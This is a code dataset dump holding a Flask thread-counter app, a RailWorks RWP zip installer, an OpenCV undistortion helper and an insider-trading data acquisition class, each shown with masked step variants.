This endpoint is for adding threads to the application.
Loadbalancer decids to go for which instances and based on that thread is added to it.
"""
instance_id = os.getenv("CF_INSTANCE_INDEX")
print 'Instance Id ****************%s'%instance_id
thread_count = int(db.hget(application_name,instance_id))
thread_count+=1
print 'Threadcount ****************%s'%thread_count
result = db.hset(application_name,str(instance_id),str(thread_count))
print 'HSET result %s'%result
print db.hgetall(application_name)
return json.dumps({'message':'success'})
@app.route('/deletethread')
def deletethread():
"""
This endpoint is for deleting threads to the application.
Loadbalancer decids to go for which instances and based on that thread is deleted from it.
"""
instance_id = os.getenv("CF_INSTANCE_INDEX")
print 'Instance Id **************%s'%instance_id
thread_count = int(db.hget(application_name,instance_id))
thread_count-=1
db.hset(application_name,instance_id,thread_count)
return json.dumps({'message':'success'})
@app.route('/instances')
def instances():
"""
This will list out all the instances and threads per application.
An application can see only it's threads and instances.
"""
mydict = db.hgetall(application_name)
ordered = OrderedDict()
for key in sorted(mydict):
ordered.__setitem__(key,mydict.get(key))
mylist = []
return render_template('robots.html', mydict=ordered)
@app.route('/')
def index():
"""
Main entry point
"""
return render_template('index.html')
if __name__ == "__main__":
init_workers()
app.run(host='0.0.0.0', port=port, debug=True)
|
normal
|
{
"blob_id": "b976dab3c621bb929eb488fa7f4394666efec2ed",
"index": 4410,
"step-1": "import os\nimport json\nfrom threading import Thread\nimport time\nfrom time import sleep\nfrom flask import Flask, json, render_template, request\nimport redis\nfrom collections import OrderedDict\nimport requests\n\nfrom Queue import Queue\n\nREGISTRAR_URL = 'http://cuteparty-registrar1.cfapps.io/update'\n\napp = Flask(__name__)\nport = int(os.getenv(\"PORT\"))\nvcap = json.loads(os.environ['VCAP_SERVICES'])\nsvc = vcap['rediscloud'][0]['credentials']\n\ndb = redis.StrictRedis(host=svc[\"hostname\"], port=svc[\"port\"], password=svc[\"password\"],db=0)\n\napplication_name = json.loads(os.environ['VCAP_APPLICATION'])['application_name']\n\nclass Producer(Thread):\n \"\"\"\n Background thread for fetching instance info\n \"\"\"\n def __init__(self,queue):\n \"\"\"\n Constructor \n \"\"\"\n Thread.__init__(self)\n self.queue = queue \n def run(self):\n \"\"\"\n This is the run implementation of the background thread , which fetchs the instaces info.\n \"\"\"\n while True :\n try:\n instance_id = os.getenv(\"CF_INSTANCE_INDEX\")\n mydict = db.hgetall(application_name)\n if instance_id not in mydict :\n self.queue.put(instance_id)\n except :\n pass\n finally:\n pass\nclass Consumer(Thread):\n \"\"\"\n Backgrdound thread for fetching from Queue and updating redis\n \"\"\"\n def __init__(self,queue):\n \"\"\"\n Constrcutor\n \"\"\"\n Thread.__init__(self)\n self.queue = queue\n \n def run(self):\n \"\"\"\n Run method for background thread which updates redis\n \"\"\"\n while True :\n try :\n instance_id = self.queue.get()\n db.hset(application_name,instance_id,1)\n except:\n pass\n finally:\n pass\n \nclass MasterUpdater(Thread):\n \"\"\"\n This background thread will update the aggregator/registrar app at provided url\n \"\"\"\n def __init__(self,db,appname):\n \"\"\"\n Constructor\n \"\"\"\n Thread.__init__(self)\n self.db = db\n self.appname = appname\n def run(self):\n \"\"\"\n Run implementation of background thread which updates the aggregator\n 
\"\"\"\n while True :\n try:\n appinfo = self.db.hgetall(self.appname)\n appinfo_str = json.dumps(appinfo)\n data = {'applicationname':self.appname,'appinfo':appinfo_str}\n response = requests.post(REGISTRAR_URL, data=data)\n time.sleep(2)\n except :\n pass\ndef init_workers():\n \"\"\"\n This method is for starting all worker threads.\n We are using three workers right now .\n 1. One for fetching latest instances info and adds to Queue\n 2. One for fetching from Queue and updating Redis\n 3. For updating the aggregator app , about this applications info.\n All are deamon threads.\n \"\"\"\n party_queue = Queue()\n p = Producer(party_queue)\n p.daemon = True\n c = Consumer(party_queue)\n c.deamon= True\n m = MasterUpdater(db,application_name)\n m.deamon = True\n p.start()\n c.start()\n m.start()\n \n\n@app.route('/addthread')\ndef addthread():\n \"\"\"\n This endpoint is for adding threads to the application.\n Loadbalancer decids to go for which instances and based on that thread is added to it. \n \"\"\"\n instance_id = os.getenv(\"CF_INSTANCE_INDEX\")\n print 'Instance Id ****************%s'%instance_id\n thread_count = int(db.hget(application_name,instance_id))\n thread_count+=1\n print 'Threadcount ****************%s'%thread_count\n result = db.hset(application_name,str(instance_id),str(thread_count))\n print 'HSET result %s'%result\n print db.hgetall(application_name)\n return json.dumps({'message':'success'})\n@app.route('/deletethread')\ndef deletethread():\n \"\"\"\n This endpoint is for deleting threads to the application.\n Loadbalancer decids to go for which instances and based on that thread is deleted from it. 
\n \"\"\"\n instance_id = os.getenv(\"CF_INSTANCE_INDEX\") \n print 'Instance Id **************%s'%instance_id\n thread_count = int(db.hget(application_name,instance_id))\n thread_count-=1\n db.hset(application_name,instance_id,thread_count)\n \n return json.dumps({'message':'success'})\n\n\n@app.route('/instances')\ndef instances():\n \"\"\"\n This will list out all the instances and threads per application.\n An application can see only it's threads and instances. \n \"\"\"\n mydict = db.hgetall(application_name)\n ordered = OrderedDict()\n for key in sorted(mydict):\n ordered.__setitem__(key,mydict.get(key))\n mylist = []\n return render_template('robots.html', mydict=ordered)\n\n\n@app.route('/')\ndef index():\n \"\"\"\n Main entry point\n \"\"\"\n return render_template('index.html')\n\nif __name__ == \"__main__\":\n init_workers()\n app.run(host='0.0.0.0', port=port, debug=True)\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
import os
import sys
import winreg
import zipfile
class RwpInstaller:
railworks_path = None
def extract(self, target):
with zipfile.ZipFile(target) as z:
if z.testzip():
return self.output('Corrupt file {}\n'.format(target))
self.output('{} file valid\n\n'.format(target))
extracted = 0
to_be_extracted = len(z.infolist())
for file in z.infolist():
extracted_path = z.extract(file, self.railworks_path).replace(
self.railworks_path, '')
extracted += 1
percent_complete = extracted / to_be_extracted
self.output('[{}/{} {}] {}\r'.format(extracted,
to_be_extracted, (round(percent_complete * 10) * '*').
ljust(10), extracted_path[-55:]))
self.output('\n\n{} extracted successfully'.format(os.path.
basename(target)))
def get_railworks_path(self):
steam_key = winreg.OpenKey(winreg.HKEY_CURRENT_USER,
'Software\\Valve\\Steam')
steam_path = winreg.QueryValueEx(steam_key, 'SteamPath')[0]
return os.path.join(steam_path, 'steamApps', 'common', 'railworks')
def output(self, out, wait=False):
if wait:
input(out)
else:
sys.stdout.write(out)
def main(self):
targets = sys.argv[1:]
if not targets:
return self.output('No RWP files passed.', wait=True)
self.railworks_path = self.get_railworks_path()
for target in targets:
self.extract(target)
self.output('\n\nAll done. Thanks for using RWP Installer.', wait=True)
if __name__ == '__main__':
RwpInstaller().main()
|
normal
|
{
"blob_id": "9c751dece67ef33ba8e5cb8281f024d2143e0808",
"index": 8811,
"step-1": "<mask token>\n\n\nclass RwpInstaller:\n <mask token>\n\n def extract(self, target):\n with zipfile.ZipFile(target) as z:\n if z.testzip():\n return self.output('Corrupt file {}\\n'.format(target))\n self.output('{} file valid\\n\\n'.format(target))\n extracted = 0\n to_be_extracted = len(z.infolist())\n for file in z.infolist():\n extracted_path = z.extract(file, self.railworks_path).replace(\n self.railworks_path, '')\n extracted += 1\n percent_complete = extracted / to_be_extracted\n self.output('[{}/{} {}] {}\\r'.format(extracted,\n to_be_extracted, (round(percent_complete * 10) * '*').\n ljust(10), extracted_path[-55:]))\n self.output('\\n\\n{} extracted successfully'.format(os.path.\n basename(target)))\n\n def get_railworks_path(self):\n steam_key = winreg.OpenKey(winreg.HKEY_CURRENT_USER,\n 'Software\\\\Valve\\\\Steam')\n steam_path = winreg.QueryValueEx(steam_key, 'SteamPath')[0]\n return os.path.join(steam_path, 'steamApps', 'common', 'railworks')\n\n def output(self, out, wait=False):\n if wait:\n input(out)\n else:\n sys.stdout.write(out)\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass RwpInstaller:\n railworks_path = None\n\n def extract(self, target):\n with zipfile.ZipFile(target) as z:\n if z.testzip():\n return self.output('Corrupt file {}\\n'.format(target))\n self.output('{} file valid\\n\\n'.format(target))\n extracted = 0\n to_be_extracted = len(z.infolist())\n for file in z.infolist():\n extracted_path = z.extract(file, self.railworks_path).replace(\n self.railworks_path, '')\n extracted += 1\n percent_complete = extracted / to_be_extracted\n self.output('[{}/{} {}] {}\\r'.format(extracted,\n to_be_extracted, (round(percent_complete * 10) * '*').\n ljust(10), extracted_path[-55:]))\n self.output('\\n\\n{} extracted successfully'.format(os.path.\n basename(target)))\n\n def get_railworks_path(self):\n steam_key = winreg.OpenKey(winreg.HKEY_CURRENT_USER,\n 'Software\\\\Valve\\\\Steam')\n steam_path = winreg.QueryValueEx(steam_key, 'SteamPath')[0]\n return os.path.join(steam_path, 'steamApps', 'common', 'railworks')\n\n def output(self, out, wait=False):\n if wait:\n input(out)\n else:\n sys.stdout.write(out)\n\n def main(self):\n targets = sys.argv[1:]\n if not targets:\n return self.output('No RWP files passed.', wait=True)\n self.railworks_path = self.get_railworks_path()\n for target in targets:\n self.extract(target)\n self.output('\\n\\nAll done. Thanks for using RWP Installer.', wait=True)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass RwpInstaller:\n railworks_path = None\n\n def extract(self, target):\n with zipfile.ZipFile(target) as z:\n if z.testzip():\n return self.output('Corrupt file {}\\n'.format(target))\n self.output('{} file valid\\n\\n'.format(target))\n extracted = 0\n to_be_extracted = len(z.infolist())\n for file in z.infolist():\n extracted_path = z.extract(file, self.railworks_path).replace(\n self.railworks_path, '')\n extracted += 1\n percent_complete = extracted / to_be_extracted\n self.output('[{}/{} {}] {}\\r'.format(extracted,\n to_be_extracted, (round(percent_complete * 10) * '*').\n ljust(10), extracted_path[-55:]))\n self.output('\\n\\n{} extracted successfully'.format(os.path.\n basename(target)))\n\n def get_railworks_path(self):\n steam_key = winreg.OpenKey(winreg.HKEY_CURRENT_USER,\n 'Software\\\\Valve\\\\Steam')\n steam_path = winreg.QueryValueEx(steam_key, 'SteamPath')[0]\n return os.path.join(steam_path, 'steamApps', 'common', 'railworks')\n\n def output(self, out, wait=False):\n if wait:\n input(out)\n else:\n sys.stdout.write(out)\n\n def main(self):\n targets = sys.argv[1:]\n if not targets:\n return self.output('No RWP files passed.', wait=True)\n self.railworks_path = self.get_railworks_path()\n for target in targets:\n self.extract(target)\n self.output('\\n\\nAll done. Thanks for using RWP Installer.', wait=True)\n\n\nif __name__ == '__main__':\n RwpInstaller().main()\n",
"step-4": "import os\nimport sys\nimport winreg\nimport zipfile\n\n\nclass RwpInstaller:\n railworks_path = None\n\n def extract(self, target):\n with zipfile.ZipFile(target) as z:\n if z.testzip():\n return self.output('Corrupt file {}\\n'.format(target))\n self.output('{} file valid\\n\\n'.format(target))\n extracted = 0\n to_be_extracted = len(z.infolist())\n for file in z.infolist():\n extracted_path = z.extract(file, self.railworks_path).replace(\n self.railworks_path, '')\n extracted += 1\n percent_complete = extracted / to_be_extracted\n self.output('[{}/{} {}] {}\\r'.format(extracted,\n to_be_extracted, (round(percent_complete * 10) * '*').\n ljust(10), extracted_path[-55:]))\n self.output('\\n\\n{} extracted successfully'.format(os.path.\n basename(target)))\n\n def get_railworks_path(self):\n steam_key = winreg.OpenKey(winreg.HKEY_CURRENT_USER,\n 'Software\\\\Valve\\\\Steam')\n steam_path = winreg.QueryValueEx(steam_key, 'SteamPath')[0]\n return os.path.join(steam_path, 'steamApps', 'common', 'railworks')\n\n def output(self, out, wait=False):\n if wait:\n input(out)\n else:\n sys.stdout.write(out)\n\n def main(self):\n targets = sys.argv[1:]\n if not targets:\n return self.output('No RWP files passed.', wait=True)\n self.railworks_path = self.get_railworks_path()\n for target in targets:\n self.extract(target)\n self.output('\\n\\nAll done. Thanks for using RWP Installer.', wait=True)\n\n\nif __name__ == '__main__':\n RwpInstaller().main()\n",
"step-5": null,
"step-ids": [
4,
6,
7,
8
]
}
|
[
4,
6,
7,
8
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def undistort_img(img):
"""
Return an undistorted image given previous calibrated parameters
References from OpenCV docs
"""
ret = load_camera_ret()
K = load_K()
dist = load_camera_dist()
h, w = img.shape[:2]
new_camera_matrix, roi = cv2.getOptimalNewCameraMatrix(K, dist, (w, h),
1, (w, h))
img_undistorted = cv2.undistort(img, K, dist, None, new_camera_matrix)
return img_undistorted
<|reserved_special_token_1|>
import numpy as np
import cv2
from camera import load_K, load_camera_dist, load_camera_ret
def undistort_img(img):
"""
Return an undistorted image given previous calibrated parameters
References from OpenCV docs
"""
ret = load_camera_ret()
K = load_K()
dist = load_camera_dist()
h, w = img.shape[:2]
new_camera_matrix, roi = cv2.getOptimalNewCameraMatrix(K, dist, (w, h),
1, (w, h))
img_undistorted = cv2.undistort(img, K, dist, None, new_camera_matrix)
return img_undistorted
<|reserved_special_token_1|>
import numpy as np
import cv2
from camera import load_K, load_camera_dist, load_camera_ret
def undistort_img(img):
'''
Return an undistorted image given previous calibrated parameters
References from OpenCV docs
'''
ret = load_camera_ret()
K = load_K()
dist = load_camera_dist()
h,w = img.shape[:2]
new_camera_matrix, roi = cv2.getOptimalNewCameraMatrix(K,dist,(w,h),1,(w,h))
img_undistorted = cv2.undistort(img, K, dist, None, new_camera_matrix)
return img_undistorted
|
flexible
|
{
"blob_id": "844c630d3fe2dda833064556228b524608cfece9",
"index": 4671,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef undistort_img(img):\n \"\"\"\n Return an undistorted image given previous calibrated parameters \n References from OpenCV docs\n \"\"\"\n ret = load_camera_ret()\n K = load_K()\n dist = load_camera_dist()\n h, w = img.shape[:2]\n new_camera_matrix, roi = cv2.getOptimalNewCameraMatrix(K, dist, (w, h),\n 1, (w, h))\n img_undistorted = cv2.undistort(img, K, dist, None, new_camera_matrix)\n return img_undistorted\n",
"step-3": "import numpy as np\nimport cv2\nfrom camera import load_K, load_camera_dist, load_camera_ret\n\n\ndef undistort_img(img):\n \"\"\"\n Return an undistorted image given previous calibrated parameters \n References from OpenCV docs\n \"\"\"\n ret = load_camera_ret()\n K = load_K()\n dist = load_camera_dist()\n h, w = img.shape[:2]\n new_camera_matrix, roi = cv2.getOptimalNewCameraMatrix(K, dist, (w, h),\n 1, (w, h))\n img_undistorted = cv2.undistort(img, K, dist, None, new_camera_matrix)\n return img_undistorted\n",
"step-4": "import numpy as np\nimport cv2\n\nfrom camera import load_K, load_camera_dist, load_camera_ret\n\ndef undistort_img(img):\n '''\n Return an undistorted image given previous calibrated parameters \n References from OpenCV docs\n '''\n ret = load_camera_ret()\n K = load_K()\n dist = load_camera_dist()\n h,w = img.shape[:2]\n\n new_camera_matrix, roi = cv2.getOptimalNewCameraMatrix(K,dist,(w,h),1,(w,h))\n img_undistorted = cv2.undistort(img, K, dist, None, new_camera_matrix)\n\n return img_undistorted\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
class FintelInsiderAcquisition:
def __init__(self, trading_date=None):
self.task_name = 'FintelInsiderAcquisition'
self.trading_date = trading_date
self.symbols = Financial_Symbols.get_all()
self.finance_db = None
self._reset_counters()
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def get_incomplete_insider_tasks(self):
if not self.finance_db or not self.trading_date:
return []
found = set(list(map(lambda x: x['symbol'], self.finance_db.find({
'trading_date': str(self.trading_date.date())}, {'symbol': 1}))))
return list(set(self.symbols) - found)
def get_complete_insider_tasks(self):
symbols = []
if not self.finance_db or not self.trading_date:
return symbols
found = set(map(lambda x: x['symbol'], list(self.finance_db.find({
'trading_date': str(self.trading_date.date())}, {'symbol': 1}))))
return list(found)
def start(self):
self._reset_counters()
if self.trading_date.weekday() > 4:
self._log('Not running {} on weekend'.format(self.task_name))
elif self.trading_date.weekday() <= 4 and self.trading_date.hour < 16:
self._log('Trading day has not finished yet, {}'.format(self.
trading_date.time()))
else:
self.finance_db = FinanceDB('stock_insider')
incomplete = self.get_incomplete_insider_tasks()
insider_transactions = InsiderTransactions(incomplete, batching
=True)
for insider_data in insider_transactions.generate():
documents = []
for symbol, data in insider_data.items():
if data:
data['trading_date'] = str(self.trading_date.date())
data['symbol'] = symbol
documents.append(data)
self.found += 1
else:
self.not_found += 1
if documents:
self.finance_db.insert_many(documents)
self._log('{}/{} found/not_found'.format(self.found, self.
not_found))
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class FintelInsiderAcquisition:
def __init__(self, trading_date=None):
self.task_name = 'FintelInsiderAcquisition'
self.trading_date = trading_date
self.symbols = Financial_Symbols.get_all()
self.finance_db = None
self._reset_counters()
def _reset_counters(self):
self.found = 0
self.not_found = 0
self.symbols = Financial_Symbols.get_all()
<|reserved_special_token_0|>
def get_incomplete_insider_tasks(self):
if not self.finance_db or not self.trading_date:
return []
found = set(list(map(lambda x: x['symbol'], self.finance_db.find({
'trading_date': str(self.trading_date.date())}, {'symbol': 1}))))
return list(set(self.symbols) - found)
def get_complete_insider_tasks(self):
symbols = []
if not self.finance_db or not self.trading_date:
return symbols
found = set(map(lambda x: x['symbol'], list(self.finance_db.find({
'trading_date': str(self.trading_date.date())}, {'symbol': 1}))))
return list(found)
def start(self):
self._reset_counters()
if self.trading_date.weekday() > 4:
self._log('Not running {} on weekend'.format(self.task_name))
elif self.trading_date.weekday() <= 4 and self.trading_date.hour < 16:
self._log('Trading day has not finished yet, {}'.format(self.
trading_date.time()))
else:
self.finance_db = FinanceDB('stock_insider')
incomplete = self.get_incomplete_insider_tasks()
insider_transactions = InsiderTransactions(incomplete, batching
=True)
for insider_data in insider_transactions.generate():
documents = []
for symbol, data in insider_data.items():
if data:
data['trading_date'] = str(self.trading_date.date())
data['symbol'] = symbol
documents.append(data)
self.found += 1
else:
self.not_found += 1
if documents:
self.finance_db.insert_many(documents)
self._log('{}/{} found/not_found'.format(self.found, self.
not_found))
def sleep_time(self):
now = datetime.now()
if self.found + self.not_found == 0:
if now.weekday() > 4:
next_trading = now + timedelta(days=7 - now.weekday())
tomorrow = datetime(year=next_trading.year, month=
next_trading.month, day=next_trading.day, hour=16,
minute=0, second=0)
return (tomorrow - now).total_seconds()
elif now.weekday() <= 4 and now.hour < 16:
later = datetime(year=now.year, month=now.month, day=now.
day, hour=16, minute=0, second=0)
return (later - now).total_seconds()
else:
return 900
elif self.found == 0 and self.not_found > 0:
if now.hour < 16:
later = datetime(year=now.year, month=now.month, day=now.
day, hour=16, minute=0, second=0)
return (later - now).total_seconds()
else:
tomorrow = now + timedelta(days=1)
tomorrow = datetime(year=tomorrow.year, month=tomorrow.
month, day=tomorrow.day, hour=16, minute=0, second=0)
return (tomorrow - now).total_seconds()
else:
return 900
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class FintelInsiderAcquisition:
def __init__(self, trading_date=None):
self.task_name = 'FintelInsiderAcquisition'
self.trading_date = trading_date
self.symbols = Financial_Symbols.get_all()
self.finance_db = None
self._reset_counters()
def _reset_counters(self):
self.found = 0
self.not_found = 0
self.symbols = Financial_Symbols.get_all()
def _log(self, msg, level='info'):
pass
def get_incomplete_insider_tasks(self):
if not self.finance_db or not self.trading_date:
return []
found = set(list(map(lambda x: x['symbol'], self.finance_db.find({
'trading_date': str(self.trading_date.date())}, {'symbol': 1}))))
return list(set(self.symbols) - found)
def get_complete_insider_tasks(self):
symbols = []
if not self.finance_db or not self.trading_date:
return symbols
found = set(map(lambda x: x['symbol'], list(self.finance_db.find({
'trading_date': str(self.trading_date.date())}, {'symbol': 1}))))
return list(found)
def start(self):
self._reset_counters()
if self.trading_date.weekday() > 4:
self._log('Not running {} on weekend'.format(self.task_name))
elif self.trading_date.weekday() <= 4 and self.trading_date.hour < 16:
self._log('Trading day has not finished yet, {}'.format(self.
trading_date.time()))
else:
self.finance_db = FinanceDB('stock_insider')
incomplete = self.get_incomplete_insider_tasks()
insider_transactions = InsiderTransactions(incomplete, batching
=True)
for insider_data in insider_transactions.generate():
documents = []
for symbol, data in insider_data.items():
if data:
data['trading_date'] = str(self.trading_date.date())
data['symbol'] = symbol
documents.append(data)
self.found += 1
else:
self.not_found += 1
if documents:
self.finance_db.insert_many(documents)
self._log('{}/{} found/not_found'.format(self.found, self.
not_found))
def sleep_time(self):
now = datetime.now()
if self.found + self.not_found == 0:
if now.weekday() > 4:
next_trading = now + timedelta(days=7 - now.weekday())
tomorrow = datetime(year=next_trading.year, month=
next_trading.month, day=next_trading.day, hour=16,
minute=0, second=0)
return (tomorrow - now).total_seconds()
elif now.weekday() <= 4 and now.hour < 16:
later = datetime(year=now.year, month=now.month, day=now.
day, hour=16, minute=0, second=0)
return (later - now).total_seconds()
else:
return 900
elif self.found == 0 and self.not_found > 0:
if now.hour < 16:
later = datetime(year=now.year, month=now.month, day=now.
day, hour=16, minute=0, second=0)
return (later - now).total_seconds()
else:
tomorrow = now + timedelta(days=1)
tomorrow = datetime(year=tomorrow.year, month=tomorrow.
month, day=tomorrow.day, hour=16, minute=0, second=0)
return (tomorrow - now).total_seconds()
else:
return 900
if __name__ == '__main__':
FintelInsiderAcquisition(datetime.now()).start()
<|reserved_special_token_1|>
from datetime import datetime, timedelta
from request.insider_networking import InsiderTransactions
from db import FinanceDB
from acquisition.symbol.financial_symbols import Financial_Symbols
class FintelInsiderAcquisition:
def __init__(self, trading_date=None):
self.task_name = 'FintelInsiderAcquisition'
self.trading_date = trading_date
self.symbols = Financial_Symbols.get_all()
self.finance_db = None
self._reset_counters()
def _reset_counters(self):
self.found = 0
self.not_found = 0
self.symbols = Financial_Symbols.get_all()
def _log(self, msg, level='info'):
pass
def get_incomplete_insider_tasks(self):
if not self.finance_db or not self.trading_date:
return []
found = set(list(map(lambda x: x['symbol'], self.finance_db.find({
'trading_date': str(self.trading_date.date())}, {'symbol': 1}))))
return list(set(self.symbols) - found)
def get_complete_insider_tasks(self):
symbols = []
if not self.finance_db or not self.trading_date:
return symbols
found = set(map(lambda x: x['symbol'], list(self.finance_db.find({
'trading_date': str(self.trading_date.date())}, {'symbol': 1}))))
return list(found)
def start(self):
self._reset_counters()
if self.trading_date.weekday() > 4:
self._log('Not running {} on weekend'.format(self.task_name))
elif self.trading_date.weekday() <= 4 and self.trading_date.hour < 16:
self._log('Trading day has not finished yet, {}'.format(self.
trading_date.time()))
else:
self.finance_db = FinanceDB('stock_insider')
incomplete = self.get_incomplete_insider_tasks()
insider_transactions = InsiderTransactions(incomplete, batching
=True)
for insider_data in insider_transactions.generate():
documents = []
for symbol, data in insider_data.items():
if data:
data['trading_date'] = str(self.trading_date.date())
data['symbol'] = symbol
documents.append(data)
self.found += 1
else:
self.not_found += 1
if documents:
self.finance_db.insert_many(documents)
self._log('{}/{} found/not_found'.format(self.found, self.
not_found))
def sleep_time(self):
now = datetime.now()
if self.found + self.not_found == 0:
if now.weekday() > 4:
next_trading = now + timedelta(days=7 - now.weekday())
tomorrow = datetime(year=next_trading.year, month=
next_trading.month, day=next_trading.day, hour=16,
minute=0, second=0)
return (tomorrow - now).total_seconds()
elif now.weekday() <= 4 and now.hour < 16:
later = datetime(year=now.year, month=now.month, day=now.
day, hour=16, minute=0, second=0)
return (later - now).total_seconds()
else:
return 900
elif self.found == 0 and self.not_found > 0:
if now.hour < 16:
later = datetime(year=now.year, month=now.month, day=now.
day, hour=16, minute=0, second=0)
return (later - now).total_seconds()
else:
tomorrow = now + timedelta(days=1)
tomorrow = datetime(year=tomorrow.year, month=tomorrow.
month, day=tomorrow.day, hour=16, minute=0, second=0)
return (tomorrow - now).total_seconds()
else:
return 900
if __name__ == '__main__':
FintelInsiderAcquisition(datetime.now()).start()
<|reserved_special_token_1|>
from datetime import datetime, timedelta
from request.insider_networking import InsiderTransactions
from db import FinanceDB
from acquisition.symbol.financial_symbols import Financial_Symbols
class FintelInsiderAcquisition():
def __init__(self, trading_date=None):
self.task_name = 'FintelInsiderAcquisition'
self.trading_date = trading_date
self.symbols = Financial_Symbols.get_all()
self.finance_db = None
self._reset_counters()
def _reset_counters(self):
self.found = 0
self.not_found = 0
self.symbols = Financial_Symbols.get_all()
def _log(self, msg, level='info'):
pass
def get_incomplete_insider_tasks(self):
if not self.finance_db or not self.trading_date:
return []
found = set(list(map(lambda x: x['symbol'], self.finance_db.find({"trading_date": str(self.trading_date.date())}, {"symbol": 1}))))
return list(set(self.symbols) - found)
def get_complete_insider_tasks(self):
symbols = []
if not self.finance_db or not self.trading_date:
return symbols
found = set(map(lambda x: x['symbol'], list(self.finance_db.find({"trading_date": str(self.trading_date.date())}, {"symbol": 1}))))
return list(found)
def start(self):
self._reset_counters()
if self.trading_date.weekday() > 4:
self._log('Not running {} on weekend'.format(self.task_name))
elif self.trading_date.weekday() <= 4 and self.trading_date.hour < 16:
self._log('Trading day has not finished yet, {}'.format(self.trading_date.time()))
else:
self.finance_db = FinanceDB('stock_insider')
incomplete = self.get_incomplete_insider_tasks()
insider_transactions = InsiderTransactions(incomplete, batching=True)
for insider_data in insider_transactions.generate():
documents = []
for symbol, data in insider_data.items():
if data:
data['trading_date'] = str(self.trading_date.date())
data['symbol'] = symbol
documents.append(data)
self.found += 1
else:
self.not_found += 1
if documents:
self.finance_db.insert_many(documents)
self._log('{}/{} found/not_found'.format(self.found, self.not_found))
# incomplete = len(self.get_incomplete_insider_tasks())
# complete = len(self.get_complete_insider_tasks())
# self._log('{}/{} complete/incomplete'.format(complete, incomplete))
def sleep_time(self):
now = datetime.now()
if self.found + self.not_found == 0:
if now.weekday() > 4:
next_trading = now + timedelta(days=7-now.weekday())
tomorrow = datetime(year=next_trading.year, month=next_trading.month, day=next_trading.day, hour=16, minute=0, second=0)
return (tomorrow - now).total_seconds()
elif now.weekday() <= 4 and now.hour < 16:
later = datetime(year=now.year, month=now.month, day=now.day, hour=16, minute=0, second=0)
return (later - now).total_seconds()
else:
return 900
elif self.found == 0 and self.not_found > 0:
if now.hour < 16:
later = datetime(year=now.year, month=now.month, day=now.day, hour=16, minute=0, second=0)
return (later - now).total_seconds()
else:
tomorrow = now + timedelta(days=1)
tomorrow = datetime(year=tomorrow.year, month=tomorrow.month, day=tomorrow.day, hour=16, minute=0, second=0)
return (tomorrow - now).total_seconds()
else:
return 900
if __name__ == "__main__":
FintelInsiderAcquisition(datetime.now()).start()
|
flexible
|
{
"blob_id": "08b13069020696d59028003a11b0ff06014a4c68",
"index": 3779,
"step-1": "<mask token>\n\n\nclass FintelInsiderAcquisition:\n\n def __init__(self, trading_date=None):\n self.task_name = 'FintelInsiderAcquisition'\n self.trading_date = trading_date\n self.symbols = Financial_Symbols.get_all()\n self.finance_db = None\n self._reset_counters()\n <mask token>\n <mask token>\n\n def get_incomplete_insider_tasks(self):\n if not self.finance_db or not self.trading_date:\n return []\n found = set(list(map(lambda x: x['symbol'], self.finance_db.find({\n 'trading_date': str(self.trading_date.date())}, {'symbol': 1}))))\n return list(set(self.symbols) - found)\n\n def get_complete_insider_tasks(self):\n symbols = []\n if not self.finance_db or not self.trading_date:\n return symbols\n found = set(map(lambda x: x['symbol'], list(self.finance_db.find({\n 'trading_date': str(self.trading_date.date())}, {'symbol': 1}))))\n return list(found)\n\n def start(self):\n self._reset_counters()\n if self.trading_date.weekday() > 4:\n self._log('Not running {} on weekend'.format(self.task_name))\n elif self.trading_date.weekday() <= 4 and self.trading_date.hour < 16:\n self._log('Trading day has not finished yet, {}'.format(self.\n trading_date.time()))\n else:\n self.finance_db = FinanceDB('stock_insider')\n incomplete = self.get_incomplete_insider_tasks()\n insider_transactions = InsiderTransactions(incomplete, batching\n =True)\n for insider_data in insider_transactions.generate():\n documents = []\n for symbol, data in insider_data.items():\n if data:\n data['trading_date'] = str(self.trading_date.date())\n data['symbol'] = symbol\n documents.append(data)\n self.found += 1\n else:\n self.not_found += 1\n if documents:\n self.finance_db.insert_many(documents)\n self._log('{}/{} found/not_found'.format(self.found, self.\n not_found))\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass FintelInsiderAcquisition:\n\n def __init__(self, trading_date=None):\n self.task_name = 'FintelInsiderAcquisition'\n self.trading_date = trading_date\n self.symbols = Financial_Symbols.get_all()\n self.finance_db = None\n self._reset_counters()\n\n def _reset_counters(self):\n self.found = 0\n self.not_found = 0\n self.symbols = Financial_Symbols.get_all()\n <mask token>\n\n def get_incomplete_insider_tasks(self):\n if not self.finance_db or not self.trading_date:\n return []\n found = set(list(map(lambda x: x['symbol'], self.finance_db.find({\n 'trading_date': str(self.trading_date.date())}, {'symbol': 1}))))\n return list(set(self.symbols) - found)\n\n def get_complete_insider_tasks(self):\n symbols = []\n if not self.finance_db or not self.trading_date:\n return symbols\n found = set(map(lambda x: x['symbol'], list(self.finance_db.find({\n 'trading_date': str(self.trading_date.date())}, {'symbol': 1}))))\n return list(found)\n\n def start(self):\n self._reset_counters()\n if self.trading_date.weekday() > 4:\n self._log('Not running {} on weekend'.format(self.task_name))\n elif self.trading_date.weekday() <= 4 and self.trading_date.hour < 16:\n self._log('Trading day has not finished yet, {}'.format(self.\n trading_date.time()))\n else:\n self.finance_db = FinanceDB('stock_insider')\n incomplete = self.get_incomplete_insider_tasks()\n insider_transactions = InsiderTransactions(incomplete, batching\n =True)\n for insider_data in insider_transactions.generate():\n documents = []\n for symbol, data in insider_data.items():\n if data:\n data['trading_date'] = str(self.trading_date.date())\n data['symbol'] = symbol\n documents.append(data)\n self.found += 1\n else:\n self.not_found += 1\n if documents:\n self.finance_db.insert_many(documents)\n self._log('{}/{} found/not_found'.format(self.found, self.\n not_found))\n\n def sleep_time(self):\n now = datetime.now()\n if self.found + self.not_found == 0:\n if now.weekday() > 4:\n 
